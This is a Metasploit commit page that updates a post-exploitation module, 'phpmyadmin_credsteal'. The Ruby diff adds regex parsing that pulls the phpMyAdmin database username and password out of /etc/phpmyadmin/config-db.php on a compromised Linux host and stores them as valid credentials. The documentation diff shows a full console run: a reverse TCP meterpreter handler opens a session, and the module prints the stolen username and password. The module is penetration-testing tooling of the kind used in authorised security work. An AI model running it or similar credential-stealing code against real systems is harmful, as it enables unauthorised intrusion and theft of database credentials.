Land #10598, Store Credentials Found with PhpMyAdmin Password Extractor

4.x
Jacob Robles 2018-09-10 11:49:52 -05:00 committed by Metasploit
parent 3e801c22fb
commit 5861087061
No known key found for this signature in database
GPG Key ID: CDFB5FA52007B954
2 changed files with 48 additions and 35 deletions

View File

@ -15,36 +15,34 @@ This post module gathers PhpMyAdmin Creds from target Linux machine.
## Scenarios ## Scenarios
``` ```
msf exploit(multi/handler) > [*] Sending stage (857352 bytes) to 127.0.0.1 msf5 > use multi/handler
[*] Meterpreter session 1 opened (127.0.0.1:4444 -> 127.0.0.1:46066) at 2018-08-18 14:46:52 -0400 msf5 exploit(multi/handler) > set lhost 192.168.37.1
lhost => 192.168.37.1
msf5 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > run
msf exploit(multi/handler) > use post/linux/gather/phpmyadmin_credsteal [*] Started reverse TCP handler on 192.168.37.1:4444
msf post(linux/gather/phpmyadmin_credsteal) > set SESSION 1 [*] Sending stage (816260 bytes) to 192.168.37.226
SESSION => 1 [*] Meterpreter session 2 opened (192.168.37.1:4444 -> 192.168.37.226:34880) at 2018-09-06 08:49:52 -0500
msf post(linux/gather/phpmyadmin_credsteal) > exploit
meterpreter > background
[*] Backgrounding session 2...
msf5 exploit(multi/handler) > use post/linux/gather/phpmyadmin_credsteal
msf5 post(linux/gather/phpmyadmin_credsteal) > set session 2
session => 2
msf5 post(linux/gather/phpmyadmin_credsteal) > run
PhpMyAdmin Creds Stealer!
[+] PhpMyAdmin config found! [+] PhpMyAdmin config found!
[+] Extracting config file! [+] Extracting creds
[+] User: admin
<?php [+] Password: acoolpassword
## [*] Storing credentials...
## database access settings in php format [+] Config file located at /Users/space/.msf4/loot/20180907081056_default_192.168.37.226_phpmyadmin_conf_580315.txt
## automatically generated from /etc/dbconfig-common/phpmyadmin.conf
## by /usr/sbin/dbconfig-generate-include
##
## by default this file is managed via ucf, so you shouldn't have to
## worry about manual changes being silently discarded. *however*,
## you'll probably also want to edit the configuration file mentioned
## above too.
##
$dbuser='phpmyadmin';
$dbpass='Passw0rd';
$basepath='';
$dbname='phpmyadmin';
$dbserver='localhost';
$dbport='3306';
$dbtype='mysql';
[*] Post module execution completed [*] Post module execution completed
msf post(linux/gather/phpmyadmin_credsteal) > msf5 post(linux/gather/phpmyadmin_credsteal) >
``` ```

View File

@ -25,32 +25,47 @@ class MetasploitModule < Msf::Post
)) ))
end end
def run def parse_creds(contents)
db_user = contents.scan(/\$dbuser\s*=\s*['"](.*)['"];/).flatten.first
db_pass = contents.scan(/\$dbpass\s*=\s*['"](.*)['"];/).flatten.first
unless db_user && db_pass
print_error("Couldn't find PhpMyAdmin credentials")
return
end
print_good("User: #{db_user}")
print_good("Password: #{db_pass}")
print_status("Storing credentials...")
store_valid_credential(user: db_user, private: db_pass)
end
def run
print_line("\nPhpMyAdmin Creds Stealer!\n") print_line("\nPhpMyAdmin Creds Stealer!\n")
cred_dump = ""
if session.platform.include?("windows") if session.platform.include?("windows")
print_error("This module is not compatible with windows") print_error("This module is not compatible with windows")
return return
end end
conf_path= "/etc/phpmyadmin/config-db.php" conf_path = "/etc/phpmyadmin/config-db.php"
unless file_exist?(conf_path) unless file_exist?(conf_path)
print_error("#{conf_path} doesn't exist on target") print_error("#{conf_path} doesn't exist on target")
return return
end end
print_good('PhpMyAdmin config found!') print_good('PhpMyAdmin config found!')
print_good("Extracting Creds")
res = read_file(conf_path) res = read_file(conf_path)
unless res unless res
print_error("You may not have permissions to read the file.") print_error("You may not have permissions to read the file.")
return return
end end
cred_dump << res print_good("Extracting creds")
p = store_loot('phpmyadmin_conf', 'text/plain', session, cred_dump, 'phpmyadmin_conf.txt', 'phpmyadmin_conf') parse_creds(res)
print_good("Credentials saved in #{p}")
p = store_loot('phpmyadmin_conf', 'text/plain', session, res, 'phpmyadmin_conf.txt', 'phpmyadmin_conf')
print_good("Config file located at #{p}")
end end
end end